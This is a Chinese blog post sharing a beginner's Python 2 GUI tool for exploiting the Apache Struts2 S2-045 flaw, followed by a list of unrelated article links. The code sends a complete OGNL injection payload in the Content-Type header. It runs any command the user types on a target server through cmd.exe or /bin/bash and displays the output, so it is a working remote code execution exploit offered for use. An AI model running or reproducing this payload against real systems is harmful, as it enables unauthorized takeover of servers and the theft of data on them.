python S2-45 漏洞利用工具
2024-08-29 08:17:57
初学python脚本,写个工具练练手。第一次写勿喷。呃...忘了截图了,补上了。
程序对于处理 JSON post 有些问题,其他地方还没发现有啥问题。
#coding:utf-8
import chardet
import urllib2
import httplib
from Tkinter import *
from poster.encode import multipart_encode
from poster.streaminghttp import register_openers httplib.HTTPConnection._http_vsn = 500
httplib.HTTPConnection._http_vsn_str = 'HTTP/1.1' class START(): def __init__(self,root):
self.root=root
self.show_W_Text = Text()
self.show_url_ed = Label(root, text="请输入URL,例如:http://www.88.com,一定要有http://,否则报错")
self.edit_url = Entry(root, text="输入地址",width = 80)
self.show_cmd_ed = Label(root, text="请输入命令,例如:whoami")
self.edit_cmd = Entry(root, text="输入命令",width = 80)
self.butt_whois = Button(root, text="发送测试",command=self.poc)
self.show_url_ed.pack()
self.edit_url.pack()
self.show_cmd_ed.pack()
self.edit_cmd.pack()
self.butt_whois.pack()
self.show_W_Text.pack() def poc(self):
w_url = self.edit_url.get()
w_cmd = self.edit_cmd.get()
text = self.show_W_Text
register_openers()
datagen, header = multipart_encode({"image1":""})
header[
"User-Agent"] = "Chrome/56.0.2924.87"
header[
"Content-Type"] = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"+w_cmd+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
request = urllib2.Request(w_url, datagen, headers=header)
response = urllib2.urlopen(request).read()
char = chardet.detect(response)["encoding"]
if char == 'GB2312':
response = response.decode("GBK").encode("UTF-8")
else:
response = response.decode(char).encode("UTF-8")
text.insert(1.0, "执行结果为:\n"+response) if __name__ == '__main__': root=Tk()
root.title("S2-45漏洞检测")
motion=START(root)
mainloop()
最新文章
- VMware安装Centos7,已将该虚拟机配置为使用64为,却无法执行64位操作
- maven-各配置文件详解
- python UnicodeDecodeError: 'ascii' codec can't decode byte 0xa6 in position 907: ordinal not in range(128)
- Django过滤器列表
- IE、chrome、火狐中如何调试javascript脚本
- 动态加载故事storyboard
- 插件五之滚动条jquery.slimscroll.js
- hdu 5534 Partial Tree 背包DP
- Fibonacci数列使用迭代器实现
- C# ENUM 字符串输出功能
- Xmodem协议简介
- linux配置防火墙和重启防火墙
- 如何用Eclipse+maven创建servlet 3.0 web 项目
- GDB调试——常用的命令
- JVM参数之-XX:+HeapDumpOnOutOfMemoryError(导出内存溢出的堆信息(hprof文件))
- CPU缓存一致性协议与java中的volatile关键字
- 〖Linux〗Bash快捷键使用
- 大规模WEB服务技术
- 学霸系统PipeLine功能规格说明书
- 上传文件ie7